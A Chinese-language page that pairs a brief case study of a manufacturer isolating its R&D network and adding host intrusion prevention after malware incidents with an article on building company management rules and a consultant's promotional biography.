B公司是高科技製造業,對B公司來說研發部門是公司的經營命脈,之前也是因為是其他部門的某台電腦上網後中毒,讓整個內部網路嚴重癱瘓,沒有了網路,工程師也幾乎不用工作。在此之後,B公司的IT人員決定採取實體隔離的方式,將研發部門的網路與其他部門隔開,購置另外的防火牆、交換器等網路設備,同時也將此部門網管工作的權責交由專人處理。因為對研發部門人員而言,在用戶端電腦安裝多層的防護軟體,會影響電腦處理效能,因此將網段隔離之後,制訂管理辦法要求使用者配合反而有較好的成效。
除了對研發部門的網路採取隔離措施之外,令IT部門頭大的就是高階主管使用的筆記型電腦。過去曾經發生某高階主管的筆記型電腦被植入木馬程式,而且經過一段時間後才被發現,而在該台筆記型電腦當中,存放的都是與客戶交易往來的合約文件檔!有了這次經驗,IT人員趕緊在每台重要人物所使用的筆記型電腦當中安裝用戶端入侵防禦(Host IPS)軟體,就算被植入木馬或間諜軟體,也要避免機密資料被外洩出去。
因此,對B公司來說,在資安預算有限的情況下,將資源放在風險最高的地方,是他們所採取的政策。對於一般使用者若電腦中毒,IT部門可以有比較長的緩衝時間來處理解決,且資料的重要性還不至於到極機密的狀態,因此只安裝防毒軟體,就不需要另外的防護措施了。
資料來源


制度化管理,Ready Go!

經營管理制度的建立,可謂影響企業成敗的關鍵。

過去,企業只要投入努力便可生存,而今則不然,大環境影響著企業的改變-政府政策日益開放,政治民主化,國際經濟的衝擊,勞資關係漸受重視,環保意識抬頭等,企業已無法再光靠產品,未來要賺的是管理的錢。

製造業勞力密集的情形,近幾年來已轉為服務業勞力密集,所以如何調整或有效的建立企業制度,是企業現今很重要的課題。

然而,仍有些企業對制度化的管理不重視,這大都基於以下幾個錯誤觀念:


一、 企業規模太小,講求制度化的管理不受重視,人治色彩濃厚,不重視法治,一個人決定任何事。

二、 認為談制度管理必須多用人員,反而增加成本,減少利潤。事實上,利用現有資源,使各單位有所司,則可避免重複工作的更大浪費。

三、 若執行制度管理,企業主管們不能發揮權威,無法獨攬大權,不易濟私。

四、 多半缺乏管理知識,而自認為是[自我約束]及喜歡[隨意管理],主管的決定,便是一切。

由於以上這幾個錯誤觀念,造成管理制度的建立非常不易,企業問題層出不窮,弊病百出,人員流動頻繁,故建立管理制度,應可謂當務之急。

管理制度的建構

企業不論行業屬性,不論規模大小,為了能順利運作,減少不必要的管理、提升經營績效,管理制度的建構,便成為不可或缺的必要條件。其實管理制度的內容架構並不複雜,但它卻是企業運作的基本主軸。

所謂制度化管理,可包含下列兩大部分:一)章則彙編的編製,二)內控循環的建立。在此先就第一部份加以論述。

所謂章則彙編指的是企業由上而下所製定的規章、辦法,讓全體員工加以遵循的規範,各企業得依本身條件與階段性需求,依下列八大類來建構其所需內容。特將重點舉例如下:

(一) 經營管理類:


1. 組織職掌:此部份規劃企業的組織架構和明訂各部門單位的職責功能。
2. 權責表:此項是將公司的目標、計畫、用人、核薪、銷售、採購,勤假與支出等依主管階層建立授權核簽的體系。

(二) 行銷業務管理類:


1. 業務作業管理辦法:此項是建立公司業務人員作業須知的規定。
2. 業務獎金辦法:此項是規劃業務作業的獎金計算標準。
3. 經銷商管理辦法:此項是建立公司經銷體系的經濟合約、區域、目標與各項管理內容。
4. 促銷作業管理辦法:規定公司相關促銷活動時應注意事項。

(三) 人力資源管理類:


1. 工作規範:這部份是規範公司的各項僱傭條件,應參照勞動基準法來設立。
2. 薪資管理辦法:公司的薪資制度、內容及核薪與調薪等事項。
3. 績效考核辦法:建立公司員工的考核制度。
4. 訓練辦法:此項是規範公司的訓練制度與規定。

(四) 生產(商品)管理類:


在製造業稱生產管理類,在買賣服務業稱商品管理類。

1. 生管作業準則:規定生管作業應注意事項 。
2. 進出存管理辦法:此為規定公司的資材或成品之採購、進貨、出貨及庫存管理等須知。
3. 品質管理辦法:規範品管作業須知及應品檢或品管的重點。
4. 資材採購辦法:規定公司的資材採購須知。

(五) 財務會計管理類:


1. 會計作業準則:這是將公司的會計科目定義,作業制度等的規範。
2. 預算管理辦法:規定公司的預算編擬,執行管理與檢討之重點事項。
3. 零用金管理辦法:員工的零用金申請報支等規定。
4. 總分公司會計作業準則:這是在規範企業有總分公司建制時的各項作業相關規定。

(六) 研究發展管理類:


1. 研究開發作業準則:用以規定產品研究開發過程的各項作業須知。
2. 圖檔管理辦法:公司研發的各項圖檔之建立、彙總等。
3. BOM 管理辦法:研發結果的材料結構表的建立、修正等須知。
4. 試量產管理辦法:規範新產品的試產、檢討與量產之過程。

(七) 總務行政管理類:


1. 生財器具管理辦法:這是規定公司生財器具之申請、採購、驗收、建檔、分發及盤點、報廢、維修等的作業規定。
2. 總務用品管理辦法:規範各項總務用品如文具用品等。
3. 車輛管理辦法:規定工務車的使用,保養等。

(八) 資訊管理類:


1. 電腦設備管理辦法:公司電腦設備的須知列管。
2. 軟體程式管理辦法:公司員工提出各種系統軟體需求之採購撰寫等規定。
經營管理 Easy Run

陳宗賢老師,現任聯聖企管顧問(股)公司董事長

。連鎖業、資訊業、電子業等知名企業經營顧問
。國內唯一擔任過50家企業的專業總經理
。輔導顧問案超過 2000多家企業
。1986-1996 寶島集團
。1990-昆盈企業
。1990-2007 阿瘦皮鞋
。1993 明安國際
。1995 優派國際(ViewSonic)
。1992-2000 旗標出版集團
。2004 詩威特 AI-15
。2005 歐德傢俱
陳宗賢老師在接觸企業的過程中,深深體會到大部分的中小企業都非常努力和用心,無奈未能有一完整的訓練認知,再加上中小企業用人精簡,人才不均,因此很多中小企業經營者總有一種欠缺總體經營管理認知的缺憾。這樣的體會,也間接促成了陳老師著手整理此書。

本書提供中小企業及新創業的經營者簡易的經營管理認知,以及管理重點的強調,讓有心者能以速成方式成為全方位的企業經營者,提昇企業的經營成效。